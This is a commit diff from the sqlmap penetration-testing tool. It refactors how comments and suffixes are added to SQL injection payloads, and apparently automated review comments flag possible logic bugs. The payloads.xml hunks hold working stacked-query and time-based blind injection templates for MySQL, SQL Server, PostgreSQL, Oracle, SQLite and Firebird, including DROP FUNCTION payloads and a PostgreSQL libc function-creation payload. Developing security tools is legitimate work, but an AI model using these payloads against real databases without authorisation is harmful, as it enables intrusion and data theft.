Cleaning/refactoring of bunch of stacked/suffix/comment stuff (e.g.

This commit is contained in:
Miroslav Stampar 2012-09-26 11:27:43 +02:00
parent 6bc5f44b20
commit 687f3991de
6 changed files with 47 additions and 45 deletions


@ -500,7 +500,7 @@ def checkSqlInjection(place, parameter, value):
injection.os = Backend.setOs(dValue)
if vector is None and "vector" in test and test.vector is not None:
vector = "%s%s" % (test.vector, comment or "")
vector = test.vector
injection.data[stype] = AttribDict()
injection.data[stype].title = title
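Review bot: `vector = test.vector` drops the comment that the old line folded into the stored vector, so the comment now has to be persisted on its own — __formatInjection in this same commit reads `sdata.comment` — and no assignment to `injection.data[stype].comment` is visible in this hunk; confirm it exists in the surrounding code. If it does not, every reported vector silently loses its comment. checkSqlInjection's body continues on both sides of the hunk.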


@ -128,12 +128,15 @@ def __formatInjection(inj):
for stype, sdata in inj.data.items():
title = sdata.title
vector = sdata.vector
comment = sdata.comment
if stype == PAYLOAD.TECHNIQUE.UNION:
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
title = re.sub(r"\d+ to \d+", str(count), title)
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
if count == 1:
title = title.replace("columns", "column")
elif comment:
vector = "%s%s" % (vector, comment)
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
data += " Title: %s\n" % title
data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)
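Review bot: The new `elif comment:` branch is chained to the UNION test (indentation is lost on this page, so it may even chain to `if count == 1`), so a UNION vector never gets `sdata.comment` appended even when it is set, whereas before this commit test.vector carried the comment for every technique. That is only correct if forgeInbandQuery already emits the comment from vector[5]/vector[6]; if it does not, the reported UNION vector is shorter than what was actually used. If every technique is meant to show its comment, make it a standalone statement after the UNION block: `if comment:` / `vector = "%s%s" % (vector, comment)`. __formatInjection starts before this hunk.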


@ -189,8 +189,12 @@ class Agent:
expression = self.cleanupPayload(expression)
# User supplied --suffix nullifies any eventual payload comments
comment = None if conf.suffix is not None and suffix == conf.suffix else comment
# Take default values if None
suffix = kb.injection.suffix if kb.injection and suffix is None else suffix
if kb.technique and kb.technique in kb.injection.data:
where = kb.injection.data[kb.technique].where if where is None else where
comment = kb.injection.data[kb.technique].comment if comment is None else comment
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
comment = "%00"
@ -198,16 +202,13 @@ class Agent:
if comment is not None:
expression += comment
if where is None and kb.technique and kb.technique in kb.injection.data:
where = kb.injection.data[kb.technique].where
# If we are replacing (<where>) the parameter original value with
# our payload do not append the suffix
if where == PAYLOAD.WHERE.REPLACE:
pass
elif any([kb.injection.suffix, suffix]) and not (comment and not conf.suffix):
expression += " %s" % (kb.injection.suffix or suffix)
elif suffix and not comment:
expression += " %s" % suffix
return re.sub(r"(?s);\W*;", ";", expression)
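Review bot: The `--suffix` override `comment = None if conf.suffix is not None and suffix == conf.suffix else comment` in the first hunk runs before `suffix` and `comment` receive their defaults from kb.injection two and five lines later, so a comment picked up from `kb.injection.data[kb.technique].comment` survives the override, is appended by `expression += comment`, and the later `elif suffix and not comment:` branch then skips the user's suffix. That defeats the intent stated in the comment above it whenever this method is called with suffix=None, which the goStacked and dnsUse call sites in this commit now do. Moving the override line to just after the `comment = kb.injection.data[kb.technique].comment if comment is None else comment` assignment keeps the nullification effective; the Access `%00` substitution then still sees the final comment. The method's signature (presumably suffixQuery) is outside the hunk.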


@ -466,9 +466,8 @@ def goStacked(expression, silent=False):
if conf.direct:
return direct(expression)
comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery(";%s" % expression)
query = agent.suffixQuery(query, comment)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
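Review bot: `query = agent.suffixQuery(query)` no longer passes the DBMS-level `queries[...].comment.query`, so the comment now comes from `kb.injection.data[kb.technique].comment` inside suffixQuery, which is only consulted when kb.technique is set and present in kb.injection.data. If goStacked can run before the technique has been switched to the stacked one, the trailing comment the old code always supplied is silently dropped; confirm every caller sets the technique first, or keep the old query-file comment as a fallback when the lookup yields None. The identical change in dnsUse in this commit has the same dependency. goStacked's body continues past this hunk.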


@ -71,9 +71,8 @@ def dnsUse(payload, expression):
expressionUnescaped = unescaper.unescape(expressionRequest)
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery("; %s" % expressionUnescaped)
query = agent.suffixQuery(query, comment)
query = agent.suffixQuery(query)
forgedPayload = agent.payload(newValue=query)
else:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))


@ -1072,13 +1072,13 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</vector>
<request>
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
@ -1092,13 +1092,13 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
<request>
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
<comment>--</comment>
</request>
<response>
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
@ -1114,13 +1114,13 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>2</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
<request>
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
<comment>--</comment>
</request>
<response>
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
</response>
<details>
<dbms>PostgreSQL</dbms>
@ -1969,9 +1969,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
<comment>-- </comment>
</request>
<response>
@ -1990,9 +1990,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
<comment>-- </comment>
</request>
<response>
@ -2010,9 +2010,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>; SELECT PG_SLEEP([SLEEPTIME]);</payload>
<payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
<comment>--</comment>
</request>
<response>
@ -2031,9 +2031,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000);</payload>
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
<comment>--</comment>
</request>
<response>
@ -2051,9 +2051,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
<comment>--</comment>
</request>
<response>
@ -2073,9 +2073,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';</vector>
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
<comment>--</comment>
</request>
<response>
@ -2095,9 +2095,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;</vector>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL;</payload>
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
<comment>--</comment>
</request>
<response>
@ -2115,9 +2115,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;</vector>
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5;</payload>
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
<comment>--</comment>
</request>
<response>
@ -2135,9 +2135,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment>--</comment>
</request>
<response>
@ -2155,9 +2155,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END;</vector>
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END;</payload>
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment>--</comment>
</request>
<response>
@ -2175,9 +2175,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
<request>
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
<comment>--</comment>
</request>
<response>
@ -2196,9 +2196,9 @@ Formats:
<risk>2</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE;</vector>
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;</payload>
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3</payload>
<comment>--</comment>
</request>
<response>